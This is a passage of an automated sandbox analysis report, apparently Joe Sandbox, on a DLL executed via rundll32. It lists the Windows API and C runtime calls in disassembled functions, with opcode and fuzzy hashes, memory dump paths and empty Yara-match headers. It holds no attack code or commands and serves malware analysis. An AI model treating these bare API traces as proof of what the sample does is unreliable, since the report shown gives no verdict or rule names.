                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                      • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                      • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                      • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                      • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                      • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                      • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                      • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                      • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                      • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                      • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
